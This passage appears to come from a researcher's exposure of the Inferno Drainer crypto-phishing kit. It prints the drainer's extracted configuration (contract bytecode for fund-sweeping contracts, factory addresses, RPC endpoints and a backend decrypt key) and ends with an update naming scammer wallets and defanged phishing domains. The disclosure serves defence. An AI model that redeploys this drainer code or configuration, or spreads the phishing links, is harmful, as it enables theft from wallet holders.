00000000334019f000000920410009c0000000001058019000000c001100210000000000113019f024102370000040f00000001090000290000000003010019000000600330027000000092033001970000000205000029000000000453004b00000000050340190000001f0450018f0000000505500272000001a90000613d000000000600001900000005076002100000000008790019000000000771034f000000000707043b00000000007804350000000106600039000000000756004b000001a10000413d000000010220018f000000000640004c000001b90000613d0000000505500210000000000651034f00000000055900190000000304400210000000000705043300000000074701cf000000000747022f000000000606043b0000010004400089000000000646022f00000000044601cf000000000474019f0000000000450435000100000003001f00030000000103550000000001020019000000000001042d00000092010000410000000002000414000000920320009c0000000001024019000000c0011002100000009e011001c70000800b020000390241023c0000040f0000000102200190000001c90000613d000000000101043b000000000001042d00000000010000190000000002000019024101d60000040f0000009204000041000000920510009c000000000104801900000040011002100000000001310019000000920320009c000000000204801900000060022002100000000001210019000002420001042e0000009203000041000000920420009c0000000002038019000000920410009c000000000103801900000040011002100000006002200210000000000112019f00000243000104300000001f01100039000000200200008a000000000221016f000000400100043d0000000002210019000000000312004b000000000300001900000001030040390000009b0420009c000001ed0000213d0000000103300190000001ed0000c13d000000400020043f000000000001042d0000009d0100004100000000001004350000004101000039000000040010043f00000024020000390000000001000019024101d60000040f000000000110004c000001f70000613d000000000001042d000000400100043d00000044021000390000009f030000410000000000320435000000240210003900000017030000390000000000320435000000a00200004100000000002104350000000402100039000000200300003900000000003204350000006402000039024101d60000040f000100000000000200000001020000320000022f0000613d000000a10120009c000002300000813d0000003f01200039000100000002001d000000200200008a000000000121016f024101df0000040f000000010200002900000000002104350000002001100039000000030200036700000001040000310000001f0340018f0000000504400272000002200000613d000000000500001900000005065002100000000007610019000000000662034f000000000606043b00000000006704350000000105500039000000000645004b000002180000413d000000000530004c0000022f0000613d0000000504400210000000000242034f00000000014100190000000303300210000000000401043300000000043401cf000000000434022f000000000202043b0000010003300089000000000232022f00000000023201cf000000000242019f0000000000210435000000000001042d0000009d0100004100000000001004350000004101000039000000040010043f00000024020000390000000001000019024101d60000040f0000023a002104210000000102000039000000000001042d0000000002000019000002390000013d0000023f002104230000000102000039000000000001042d00000000020000190000023e0000013d0000024100000432000002420001042e0000024300010430000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffff8000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff0000000000000000000000000000000000000000938b5f3299a1f3b18e458564efbb950733226014eece26fae19012d850b48d83000000020000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000cce3d5d300000000000000000000000000000000000000000000000000000000caa5c23f0200000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000ffffffffffffffff000000000000000000000000000000000000000000000000ffffffffffffffbf4e487b7100000000000000000000000000000000000000000000000000000000020000020000000000000000000000000000000400000000000000000000000043616c6c6572206973206e6f7420746865206f776e657200000000000000000008c379a00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100000000000000000000000000000000000000000000000000000000000000000000000000000000",
"369": 1,
"1101": 1,
"1284": 1,
"1285": 1,
"4200": "0x608060405234801561001057600080fd5b5060405161055638038061055683398101604081905261002f9161005d565b600180546001600160a01b039092166001600160a01b0319928316179055600080549091163217905561008d565b60006020828403121561006f57600080fd5b81516001600160a01b038116811461008657600080fd5b9392505050565b6104ba8061009c6000396000f3fe608060405234801561001057600080fd5b50600436106100365760003560e01c8063caa5c23f1461003b578063cce3d5d314610050575b600080fd5b61004e610049366004610292565b610063565b005b61004e61005e3660046103ff565b610176565b6000546001600160a01b031632146100bc5760405162461bcd60e51b815260206004820152601760248201527621b0b63632b91034b9903737ba103a34329037bbb732b960491b60448201526064015b60405180910390fd5b60005b8151811015610172578181815181106100da576100da610418565b6020026020010151600001516001600160a01b031682828151811061010157610101610418565b60200260200101516020015160405161011a919061042e565b6000604051808303816000865af19150503d8060008114610157576040519150601f19603f3d011682016040523d82523d6000602084013e61015c565b606091505b505050808061016a9061045d565b9150506100bf565b5050565b6000546001600160a01b031632146101ca5760405162461bcd60e51b815260206004820152601760248201527621b0b63632b91034b9903737ba103a34329037bbb732b960491b60448201526064016100b3565b6001546040516001600160a01b03909116908290600081818185875af1925050503d8060008114610217576040519150601f19603f3d011682016040523d82523d6000602084013e61021c565b606091505b50505050565b634e487b7160e01b600052604160045260246000fd5b6040805190810167ffffffffffffffff8111828210171561025b5761025b610222565b60405290565b604051601f8201601f1916810167ffffffffffffffff8111828210171561028a5761028a610222565b604052919050565b600060208083850312156102a557600080fd5b823567ffffffffffffffff808211156102bd57600080fd5b818501915085601f8301126102d157600080fd5b8135818111156102e3576102e3610222565b8060051b6102f2858201610261565b918252838101850191858101908984111561030c57600080fd5b86860192505b838310156103f25782358581111561032a5760008081fd5b86016040601f19828d0381018213156103435760008081fd5b61034b610238565b838b01356001600160a01b03811681146103655760008081fd5b815283830135898111156103795760008081fd5b8085019450508d603f85011261038f5760008081fd5b8a840135898111156103a3576103a3610222565b6103b38c84601f84011601610261565b92508083528e848287010111156103ca5760008081fd5b808486018d85013760009083018c0152808b0191909152845250509186019190860190610312565b9998505050505050505050565b60006020828403121561041157600080fd5b5035919050565b634e487b7160e01b600052603260045260246000fd5b6000825160005b8181101561044f5760208186018101518583015201610435565b506000920191825250919050565b60006001820161047d57634e487b7160e01b600052601160045260246000fd5b506001019056fea2646970667358221220a3c9c6a1063d7ded6a0cdc2bef5f5079db00c29875fed8d19b9cad9e46cb9e0364736f6c63430008120033",
"5000": "0x608060405234801561001057600080fd5b5060405161055638038061055683398101604081905261002f9161005d565b600180546001600160a01b039092166001600160a01b0319928316179055600080549091163217905561008d565b60006020828403121561006f57600080fd5b81516001600160a01b038116811461008657600080fd5b9392505050565b6104ba8061009c6000396000f3fe608060405234801561001057600080fd5b50600436106100365760003560e01c8063caa5c23f1461003b578063cce3d5d314610050575b600080fd5b61004e610049366004610292565b610063565b005b61004e61005e3660046103ff565b610176565b6000546001600160a01b031632146100bc5760405162461bcd60e51b815260206004820152601760248201527621b0b63632b91034b9903737ba103a34329037bbb732b960491b60448201526064015b60405180910390fd5b60005b8151811015610172578181815181106100da576100da610418565b6020026020010151600001516001600160a01b031682828151811061010157610101610418565b60200260200101516020015160405161011a919061042e565b6000604051808303816000865af19150503d8060008114610157576040519150601f19603f3d011682016040523d82523d6000602084013e61015c565b606091505b505050808061016a9061045d565b9150506100bf565b5050565b6000546001600160a01b031632146101ca5760405162461bcd60e51b815260206004820152601760248201527621b0b63632b91034b9903737ba103a34329037bbb732b960491b60448201526064016100b3565b6001546040516001600160a01b03909116908290600081818185875af1925050503d8060008114610217576040519150601f19603f3d011682016040523d82523d6000602084013e61021c565b606091505b50505050565b634e487b7160e01b600052604160045260246000fd5b6040805190810167ffffffffffffffff8111828210171561025b5761025b610222565b60405290565b604051601f8201601f1916810167ffffffffffffffff8111828210171561028a5761028a610222565b604052919050565b600060208083850312156102a557600080fd5b823567ffffffffffffffff808211156102bd57600080fd5b818501915085601f8301126102d157600080fd5b8135818111156102e3576102e3610222565b8060051b6102f2858201610261565b918252838101850191858101908984111561030c57600080fd5b86860192505b838310156103f25782358581111561032a5760008081fd5b86016040601f19828d0381018213156103435760008081fd5b61034b610238565b838b01356001600160a01b03811681146103655760008081fd5b815283830135898111156103795760008081fd5b8085019450508d603f85011261038f5760008081fd5b8a840135898111156103a3576103a3610222565b6103b38c84601f84011601610261565b92508083528e848287010111156103ca5760008081fd5b808486018d85013760009083018c0152808b0191909152845250509186019190860190610312565b9998505050505050505050565b60006020828403121561041157600080fd5b5035919050565b634e487b7160e01b600052603260045260246000fd5b6000825160005b8181101561044f5760208186018101518583015201610435565b506000920191825250919050565b60006001820161047d57634e487b7160e01b600052601160045260246000fd5b506001019056fea2646970667358221220a3c9c6a1063d7ded6a0cdc2bef5f5079db00c29875fed8d19b9cad9e46cb9e0364736f6c63430008120033",
"8453": 1,
"34443": "0x608060405234801561001057600080fd5b5060405161057038038061057083398101604081905261002f91610062565b60018054326001600160a01b031991821617909155600080549091166001600160a01b0392909216919091179055610092565b60006020828403121561007457600080fd5b81516001600160a01b038116811461008b57600080fd5b9392505050565b6104cf806100a16000396000f3fe60806040526004361061002d5760003560e01c8063caa5c23f14610046578063cce3d5d3146100665761003d565b3661003d5761003b34610081565b005b61003b34610081565b34801561005257600080fd5b5061003b610061366004610299565b610125565b34801561007257600080fd5b5061003b610081366004610406565b6001546001600160a01b031632146100cc5760405162461bcd60e51b81526020600482015260096024820152682737ba1037bbb732b960b91b60448201526064015b60405180910390fd5b600080546040516001600160a01b039091169083908381818185875af1925050503d8060008114610119576040519150601f19603f3d011682016040523d82523d6000602084013e61011e565b606091505b5050505050565b6001546001600160a01b0316321461016b5760405162461bcd60e51b81526020600482015260096024820152682737ba1037bbb732b960b91b60448201526064016100c3565b60005b815181101561022557600082828151811061018b5761018b61041f565b6020026020010151600001516001600160a01b03168383815181106101b2576101b261041f565b6020026020010151602001516040516101cb9190610435565b6000604051808303816000865af19150503d8060008114610208576040519150601f19603f3d011682016040523d82523d6000602084013e61020d565b606091505b5050905050808061021d90610470565b91505061016e565b5050565b634e487b7160e01b600052604160045260246000fd5b6040805190810167ffffffffffffffff8111828210171561026257610262610229565b60405290565b604051601f8201601f1916810167ffffffffffffffff8111828210171561029157610291610229565b604052919050565b600060208083850312156102ac57600080fd5b823567ffffffffffffffff808211156102c457600080fd5b818501915085601f8301126102d857600080fd5b8135818111156102ea576102ea610229565b8060051b6102f9858201610268565b918252838101850191858101908984111561031357600080fd5b86860192505b838310156103f9578235858111156103315760008081fd5b86016040601f19828d03810182131561034a5760008081fd5b61035261023f565b838b01356001600160a01b038116811461036c5760008081fd5b815283830135898111156103805760008081fd5b8085019450508d603f8501126103965760008081fd5b8a840135898111156103aa576103aa610229565b6103ba8c84601f84011601610268565b92508083528e848287010111156103d15760008081fd5b808486018d85013760009083018c0152808b0191909152845250509186019190860190610319565b9998505050505050505050565b60006020828403121561041857600080fd5b5035919050565b634e487b7160e01b600052603260045260246000fd5b6000825160005b81811015610456576020818601810151858301520161043c565b81811115610465576000828501525b509190910192915050565b600060001982141561049257634e487b7160e01b600052601160045260246000fd5b506001019056fea2646970667358221220b77fb93fec6aca071efbbd9b1496d55e983d1fbcc876227f457187eb569efb0b64736f6c634300080c0033",
"42161": 1,
"42220": 1,
"42766": "0x608060405234801561001057600080fd5b50604051610a1a380380610a1a8339818101604052810190610032919061011c565b80600160006101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550326000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610149565b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006100e9826100be565b9050919050565b6100f9816100de565b811461010457600080fd5b50565b600081519050610116816100f0565b92915050565b600060208284031215610132576101316100b9565b5b600061014084828501610107565b91505092915050565b6108c2806101586000396000f3fe608060405234801561001057600080fd5b50600436106100365760003560e01c8063caa5c23f1461003b578063cce3d5d314610057575b600080fd5b610055600480360381019061005091906105fa565b610073565b005b610071600480360381019061006c9190610679565b6101ca565b005b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1614610101576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016100f890610703565b60405180910390fd5b60005b81518110156101c6578181815181106101205761011f610723565b5b60200260200101516000015173ffffffffffffffffffffffffffffffffffffffff1682828151811061015557610154610723565b5b60200260200101516020015160405161016e91906107c3565b6000604051808303816000865af19150503d80600081146101ab576040519150601f19603f3d011682016040523d82523d6000602084013e6101b0565b606091505b50505080806101be90610809565b915050610104565b5050565b60008054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff163273ffffffffffffffffffffffffffffffffffffffff1614610258576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161024f90610703565b60405180910390fd5b600160009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168160405161029e90610877565b60006040518083038185875af1925050503d80600081146102db576040519150601f19603f3d011682016040523d82523d6000602084013e6102e0565b606091505b50505050565b6000604051905090565b600080fd5b600080fd5b600080fd5b6000601f19601f8301169050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b610348826102ff565b810181811067ffffffffffffffff8211171561036757610366610310565b5b80604052505050565b600061037a6102e6565b9050610386828261033f565b919050565b600067ffffffffffffffff8211156103a6576103a5610310565b5b602082029050602081019050919050565b600080fd5b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b60006103f1826103c6565b9050919050565b610401816103e6565b811461040c57600080fd5b50565b60008135905061041e816103f8565b92915050565b600080fd5b600067ffffffffffffffff82111561044457610443610310565b5b61044d826102ff565b9050602081019050919050565b82818337600083830152505050565b600061047c61047784610429565b610370565b90508281526020810184848401111561049857610497610424565b5b6104a384828561045a565b509392505050565b600082601f8301126104c0576104bf6102fa565b5b81356104d0848260208601610469565b91505092915050565b6000604082840312156104ef576104ee6103bc565b5b6104f96040610370565b905060006105098482850161040f565b600083015250602082013567ffffffffffffffff81111561052d5761052c6103c1565b5b610539848285016104ab565b60208301525092915050565b60006105586105538461038b565b610370565b9050808382526020820190506020840283018581111561057b5761057a6103b7565b5b835b818110156105c257803567ffffffffffffffff8111156105a05761059f6102fa565b5b8086016105ad89826104d9565b8552602085019450505060208101905061057d565b5050509392505050565b600082601f8301126105e1576105e06102fa565b5b81356105f1848260208601610545565b91505092915050565b6000602082840312156106105761060f6102f0565b5b600082013567ffffffffffffffff81111561062e5761062d6102f5565b5b61063a848285016105cc565b91505092915050565b6000819050919050565b61065681610643565b811461066157600080fd5b50565b6000813590506106738161064d565b92915050565b60006020828403121561068f5761068e6102f0565b5b600061069d84828501610664565b91505092915050565b600082825260208201905092915050565b7f43616c6c6572206973206e6f7420746865206f776e6572000000000000000000600082015250565b60006106ed6017836106a6565b91506106f8826106b7565b602082019050919050565b6000602082019050818103600083015261071c816106e0565b9050919050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052603260045260246000fd5b600081519050919050565b600081905092915050565b60005b8381101561078657808201518184015260208101905061076b565b60008484015250505050565b600061079d82610752565b6107a7818561075d565b93506107b7818560208601610768565b80840191505092915050565b60006107cf8284610792565b915081905092915050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b600061081482610643565b91507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8203610846576108456107da565b5b600182019050919050565b50565b600061086160008361075d565b915061086c82610851565b600082019050919050565b600061088282610854565b915081905091905056fea264697066735822122037b54e09943c6f5e6af5ec1030b0a8190ec13fe0a6c646e2c813051e954e167664736f6c63430008120033",
"43114": 1,
"59144": 5000,
"81457": 5000,
"534352": 34443,
"666666666": 5000,
"1313161554": 1
},
"factoryContracts": {
"1": "0xed0e416e0feea5b484ba5c95d375545ac2b60572",
"10": "0x2f48e4cf013f8a8e5e1245f629100e6c6aeb2ba2",
"25": "0x343d61b74aa40fa17bc056feaf1726cb4f55d74d",
"56": "0xcdf11c5736e926b0a6c2148590d76979fe703c65",
"100": "0x10e7d285d05c3ba6c16ab7278f64c47f3a70bf95",
"122": "0xa42fd02e26a33b12fb429b37da4c154a28b4bd9d",
"128": "0x07c88beebd447348b96f1ca0c7b9c047c53970ae",
"137": "0x6bd779f8a92668139e19090d9b4e49b05bfa5774",
"169": "0xf249159d2b8d81292a0dee79ca24792f372afd72",
"250": "0x04286d3b07679408145a104e8d11fdecc88fccca",
"252": "0xa81f25db81efbf3a7eeaf19a4ff88f7e05914330",
"324": "0xb8c6f0C2d957705D211f02A4012dFa3eDA32e1d6",
"369": "0x139ec2bd3fa0668e6e72485a56a8dad4489cd729",
"1101": "0x791f719d393d893afdf96676aa345aad600dc037",
"1284": "0x4707513616c100b9a3315e4a7331aad73265bc40",
"1285": "0x52aa41cd362f67d1115a9fb479e99489fbde6209",
"4200": "0xd705bce4504d2a81b71eaf53250ed46648274afa",
"5000": "0x19e12a113a294ee5005d9c10bd2f04d2fd04b240",
"8453": "0x563c770e1dddada7bd0f1dd14a020b6511388b8b",
"34443": "0x3952060fc153987053afd082971ec0e4b2e5cba6",
"42161": "0x9448803c95bad8f89fadf787dc0f43597d8f9e39",
"42220": "0xa5e01fbf36e37ea414fa455a8fe29799b7e5feaa",
"42766": "0xbd42d59bbc8604346bbc672e0942707ef0d5a6f9",
"43114": "0x3d89d6d8b37e797088ad37061debf894c12b9a1d",
"59144": "0xafb6997b20581b1e82d0c70eba606ad9f20d54d0",
"81457": "0xafb6997b20581b1e82d0c70eba606ad9f20d54d0",
"534352": "0xc5ce3568e4a265749278edd8ce44dfb763981ffe",
"666666666": "0x22db9e3f3605844e028acd18019b3a8c49a75da7",
"1313161554": "0x23e22adc17e15db6bbe400436d21ad7c19d5c8e6"
},
"wyvernReplaceProxyContract": "0x00005df0bf6e7f9cbf697f3019212ca2084e0000",
"blurFakeCollectionContract": "0x00006b35aa35b2adfacbbddcf40e2ff7934f0000",
"blurFeeRecipientContract": "0x000075c1a1d1e43b9a00688703f071a919b60000",
"chainsInformations": {
"1": {
"name": "ethereum",
"symbol": "ETH",
"explorer": "https://etherscan.io",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.ankr.com/eth",
"gasPrice": 11365851678,
"price": 3831.91
},
"10": {
"name": "optimism",
"symbol": "ETH",
"explorer": "https://optimistic.etherscan.io",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://optimism.publicnode.com",
"gasPrice": 92669693,
"price": 3831.91,
"l1BaseFee": 7224698207,
"feesDecimals": "6",
"baseFeeScalar": 1368,
"blobBaseFee": "1",
"blobBaseFeeScalar": 810949
},
"25": {
"name": "cronos",
"symbol": "CRO",
"explorer": "https://cronoscan.com",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.vvs.finance",
"gasPrice": 7575000000000,
"price": 0.11867
},
"56": {
"name": "bsc",
"symbol": "BNB",
"explorer": "https://bscscan.com",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://bsc-dataseed1.binance.org/",
"gasPrice": 1500000000,
"price": 600.3
},
"100": {
"name": "gnosis",
"symbol": "xDAI",
"explorer": "https://gnosisscan.io",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.ankr.com/gnosis",
"gasPrice": 1890442064,
"price": 0.99965
},
"122": {
"name": "fuse",
"symbol": "FUSE",
"explorer": "https://explorer.fuse.io",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.fuse.io",
"gasPrice": 16500000000,
"price": 0.04696
},
"137": {
"name": "polygon",
"symbol": "MATIC",
"explorer": "https://polygonscan.com",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.ankr.com/polygon",
"gasPrice": 48814276214,
"price": 0.717243
},
"169": {
"name": "manta",
"symbol": "ETH",
"explorer": "https://pacific-explorer.manta.network",
"multicallAddress": "0x4a7f33e69dc73ec01C1D06216d22bE06238781c1",
"rpc": "https://pacific-rpc.manta.network/http",
"gasPrice": 156966011,
"price": 3831.91,
"l1BaseFee": 7385794258,
"scalar": 0.006666,
"overhead": 1000,
"feesDecimals": "6"
},
"250": {
"name": "fantom",
"symbol": "FTM",
"explorer": "https://ftmscan.com",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.ankr.com/fantom",
"gasPrice": 9171286284,
"price": 0.8126
},
"252": {
"name": "fraxtal",
"symbol": "frxETH",
"explorer": "https://fraxscan.com",
"multicallAddress": "0x0cd2c575a9516d53ca31c9319ca27ee24cf17805",
"rpc": "https://rpc.frax.com",
"gasPrice": 1500381,
"price": 3831.91,
"l1BaseFee": 7607955878,
"scalar": 0.05,
"overhead": 188,
"feesDecimals": "6"
},
"324": {
"name": "zkSync",
"symbol": "ETH",
"explorer": "https://explorer.zksync.io",
"multicallAddress": "0xd74692c56c063edece579d16ee307c5156a2adef",
"rpc": "https://rpc.ankr.com/zksync_era",
"gasPrice": 37500000,
"price": 3831.91
},
"369": {
"name": "pulse",
"symbol": "PLS",
"explorer": "https://scan.pulsechain.com",
"multicallAddress": "0x5489fe2d8ec00e795d6ee0fd6017cb89351ba8c4",
"rpc": "https://rpc.pulsechain.com",
"gasPrice": 828627670773545,
"price": 0.000050951462856362755
},
"1101": {
"name": "polygon zkEVM",
"symbol": "ETH",
"explorer": "https://zkevm.polygonscan.com",
"multicallAddress": "0x5489fe2d8ec00e795d6ee0fd6017cb89351ba8c4",
"rpc": "https://rpc.ankr.com",
"gasPrice": 169500000,
"price": 3831.91
},
"1284": {
"name": "moonbeam",
"symbol": "GLMR",
"explorer": "https://moonscan.io",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://moonbeam-rpc.publicnode.com",
"gasPrice": 187500000000,
"price": 0.3001
},
"1285": {
"name": "moonriver",
"symbol": "MOVR",
"explorer": "https://moonriver.moonscan.io",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://moonriver-rpc.publicnode.com",
"gasPrice": 1875000000,
"price": 15.305
},
"4200": {
"name": "merlin",
"symbol": "BTC",
"explorer": "https://scan.merlinchain.io",
"multicallAddress": "0xa81f25db81efbf3a7eeaf19a4ff88f7e05914330",
"rpc": "https://rpc.merlinchain.io",
"gasPrice": 315000000,
"price": 68758.24
},
"5000": {
"name": "mantle",
"symbol": "MNT",
"explorer": "https://explorer.mantle.xyz/",
"multicallAddress": "0xda5c4dfe79458a4e3283e87de5e505bd29796695",
"rpc": "https://rpc.ankr.com/mantle",
"gasPrice": 30000000,
"price": 1.0315,
"l1BaseFee": 7298483887,
"scalar": 0.01,
"overhead": 702556,
"feesDecimals": "6"
},
"8453": {
"name": "base",
"symbol": "ETH",
"explorer": "https://basescan.org",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.ankr.com/base",
"gasPrice": 96517064,
"price": 3831.91,
"l1BaseFee": 7568779863,
"feesDecimals": "6",
"baseFeeScalar": 1101,
"blobBaseFee": "1",
"blobBaseFeeScalar": 659851
},
"34443": {
"name": "mode",
"symbol": "ETH",
"explorer": "https://explorer.mode.network",
"multicallAddress": "0x0cd2c575a9516d53ca31c9319ca27ee24cf17805",
"rpc": "https://mainnet.mode.network",
"gasPrice": 1517190,
"price": 3831.91,
"l1BaseFee": 7607955878,
"feesDecimals": "6",
"baseFeeScalar": 20000,
"blobBaseFee": "1",
"blobBaseFeeScalar": 611590
},
"42161": {
"name": "arbitrum",
"symbol": "ETH",
"explorer": "https://arbiscan.io",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://arb1.arbitrum.io/rpc",
"gasPrice": 50000000,
"price": 3831.91
},
"42220": {
"name": "celo",
"symbol": "CELO",
"explorer": "https://celoscan.io",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.ankr.com/celo",
"gasPrice": 15000000000,
"price": 0.8934
},
"42766": {
"name": "zkfair",
"symbol": "USDC",
"explorer": "https://scan.zkfair.io",
"multicallAddress": "0x0cd2c575a9516d53ca31c9319ca27ee24cf17805",
"rpc": "https://rpc.zkfair.io",
"gasPrice": 7500000000000,
"price": 1
},
"43114": {
"name": "avalanche",
"symbol": "AVAX",
"explorer": "https://snowscan.xyz",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://rpc.ankr.com/avalanche",
"gasPrice": 37500000000,
"price": 36.82
},
"59144": {
"name": "linea",
"symbol": "ETH",
"explorer": "https://lineascan.build",
"multicallAddress": "0x0cd2c575a9516d53ca31c9319ca27ee24cf17805",
"rpc": "https://linea.decubate.com",
"gasPrice": 310654360,
"price": 3831.91
},
"81457": {
"name": "blast",
"symbol": "ETH",
"explorer": "https://blastscan.io",
"multicallAddress": "0x0cd2c575a9516d53ca31c9319ca27ee24cf17805",
"rpc": "https://rpc.ankr.com/blast",
"gasPrice": 16426928,
"price": 3831.91,
"l1BaseFee": 7607955878,
"scalar": 0.684,
"overhead": 188,
"feesDecimals": "6"
},
"534352": {
"name": "scroll",
"symbol": "ETH",
"explorer": "https://scrollscan.com/",
"multicallAddress": "0xd705bce4504d2a81b71eaf53250ed46648274afa",
"rpc": "https://rpc.ankr.com/scroll",
"gasPrice": 300000000,
"price": 3831.91,
"l1BaseFee": 1004250177,
"scalar": 1.05,
"overhead": 56
},
"666666666": {
"name": "degen",
"symbol": "DEGEN",
"explorer": "https://explorer.degen.tips",
"multicallAddress": "0xf9c4265f6ca7e4231c6a86e56fe9103091f8c893",
"rpc": "https://rpc.degen.tips",
"gasPrice": 28225500,
"price": 0.02255
},
"1313161554": {
"name": "aurora",
"symbol": "ETH",
"explorer": "https://explorer.mainnet.aurora.dev",
"multicallAddress": "0xca11bde05977b3631167028862be2a173976ca11",
"rpc": "https://mainnet.aurora.dev",
"gasPrice": 105000000,
"price": 3831.91
}
},
"swapRoutersInformations": {
"1": {
"0x68b3465833fb72a70ecdf485e0e4c7bd8665fc45": {
"name": "ethereum uniswap V3 r2",
"multicall": true,
"deadline": false,
"supportingFeesOnTransferToken": false
},
"0x7a250d5630b4cf539739df2c5dacb4c659f2488d": {
"name": "ethereum uniswap V2",
"multicall": false,
"deadline": true,
"supportingFeesOnTransferToken": true
},
"0xd9e1ce17f2641f24ae83637ab66a2cca9c378b9f": {
"name": "sushi swap",
"multicall": false,
"deadline": true,
"supportingFeesOnTransferToken": true
}
},
"56": {
"0x10ed43c718714eb63d5aa57b78b54704e256024e": {
"name": "pancake swap",
"multicall": false,
"deadline": true,
"supportingFeesOnTransferToken": true
},
"0x13f4EA83D0bd40E75C8222255bc855a974568Dd4": {
"name": "pancake swap (smart router V3)",
"multicall": true,
"deadline": false,
"supportingFeesOnTransferToken": false
}
},
"137": {
"0xa5e0829caced8ffdd4de3c43696c57f7d7a678ff": {
"name": "quickswap",
"multicall": false,
"deadline": true,
"supportingFeesOnTransferToken": false
}
}
},
"swapOutputTokens": {
"1": [
"0xc02aaa39b223fe8d0a0e5c4f27ead9083c756cc2",
"0xa0b86991c6218b36c1d19d4a2e9eb0ce3606eb48",
6
],
"56": [
"0xbb4cdb9cbd36b01bd1cbaebf2de08d9173bc095c",
"0x8ac76a51cc950d9822d68b83fe1ad97b32cd580d",
18
],
"137": [
"0x0d500b1d8e8ef31e21c99d1db9a6444d3adf1270",
"0x2791bca1f2de4661ed88a30c99a7a9449aa84174",
6
]
},
"chainsWorkingWithL1Fees": [
10,
169,
252,
5000,
8453,
34443,
81457,
534352
],
"blacklisted": false
}
// Backend decrypt key
BACKEND_DECRYPT_KEY: r8hhweybk9ekz62w45qvyjnpz3xguueqg6amhbbghbckpeu8fmzdiivezfbnfxe9puz4thkpx5ejcipp53pcuydpu4yuyxx4rqqu
// Not sure what this is
DOMAIN_STORAGE: 0x6f7d740a81f093c18fd90c0938c06d736e1ee763

Update on the story 27th of May, 2024

This individual continues their phishing activities unabated. Despite numerous reports, Google has allowed the scammy advertisements to remain active for days. Where is Google’s accountability in this matter?

The “customer wallet” (where the stolen funds are funneled by Inferno Drainer) is 0xfa43058990fcaee6c6cdcfeedb1f5cfb0cd9455a. To date, over 40,000 USDC has been transferred to 0x5434ff7d47c9862c04fef9cb96f100a9a7d6a3b5.

Hostinger is providing the hosting service for this scammer. However, to their credit, they have been prompt in taking down the sites once reported. The domains in question are:

hxxps://base.seperbridge.app/home
hxxps://base.svperbridge.app/home
hxxps://base.superbrldge.app/home

// Archived evidence of the phishing
hxxps://web.archive.org/web/20240527172521/https://base.superbrldge.app/home/
hxxps://web.archive.org/web/20240521161452/https://base.seperbridge.app/home/

All of these URLs are connected to the same Inferno Drainer customer ID/wallet

// NOTE: DO NOT ENTER ANY OF THESE URLS IF YOU HAVE A WALLET INSTALLED TO YOUR BROWSER
// (Replace hxxps with https if you really want to visit some of the links)